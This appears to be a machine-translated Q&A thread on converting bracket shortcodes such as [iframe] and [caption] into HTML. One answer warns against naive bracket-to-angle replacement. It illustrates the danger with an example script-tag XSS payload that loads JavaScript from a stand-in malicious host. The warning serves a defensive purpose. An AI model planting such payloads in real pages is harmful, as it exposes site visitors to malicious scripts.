1

テキストを特定の形式にフィルター処理したいと考えています。次のようなテキストがあるとします

Lorem Ipsum は、印刷および植字業界の単なるダミー テキストです。Lorem Ipsum は 1500 年代以来、業界標準のダミー テキストでした[iframe width="200" height="300"][/iframe]。Lorem Ipsum は、印刷および組版業界の単なるダミー テキストです。Lorem Ipsum は、1500 年代以来、業界標準のダミーテキストでした。

私は次のように変換したい:

Lorem Ipsum は、印刷および植字業界の単なるダミー テキストです。Lorem Ipsum は 1500 年代以来、業界標準のダミー テキストでした < iframe width="200" height="300"></iframe >。Lorem Ipsum は、印刷および組版業界の単なるダミー テキストです。Lorem Ipsum は、1500 年代以来、業界標準のダミーテキストでした。

Ex2 :[caption]My Caption[/caption]表示されます <span class="caption">My Caption</span>

4

2 に答える 2

1

コンテンツを解析し、事前定義された「組み合わせ」を同等の html に置き換える必要があります。

また、メンバーからのコンテンツを受け入れる場合は、HTML コードを置換で直接変更することになるため、非常に注意する必要があります。

于 2011-11-19T00:11:33.970 に答える
1

James Deville は非常に良い質問をしています。おそらく最善の解決策は、既にまとめられているテキスト マークアップ システム (マークダウンなど) を使用することです。

ただし、カスタムの方法でこれを行う必要があると判断した場合 (ユーザー入力があると仮定します):

や などは使用しないでください。これにより、脆弱性にさらされる可能性が高くなります。s/\[/</s/\]/>/

誰かが入ることができた

[script type="text/javascript" src="http://malicious-server.haxx/XSS.js"]

これはに翻訳されます

<script type="text/javascript" src="http://malicious-server.haxx/XSS.js">

そのテキストの断片を見ている人は、意図せずにその悪意のある JavaScript を要求することになります。

概要:これを間違えると、重大なセキュリティの脆弱性がサイトに持ち込まれる可能性があります。したがって、可能であれば、すでに実装されているシステムを使用してください。それ以外の場合は、受け入れるタグを慎重に選択してください。

于 2011-11-19T00:14:44.880 に答える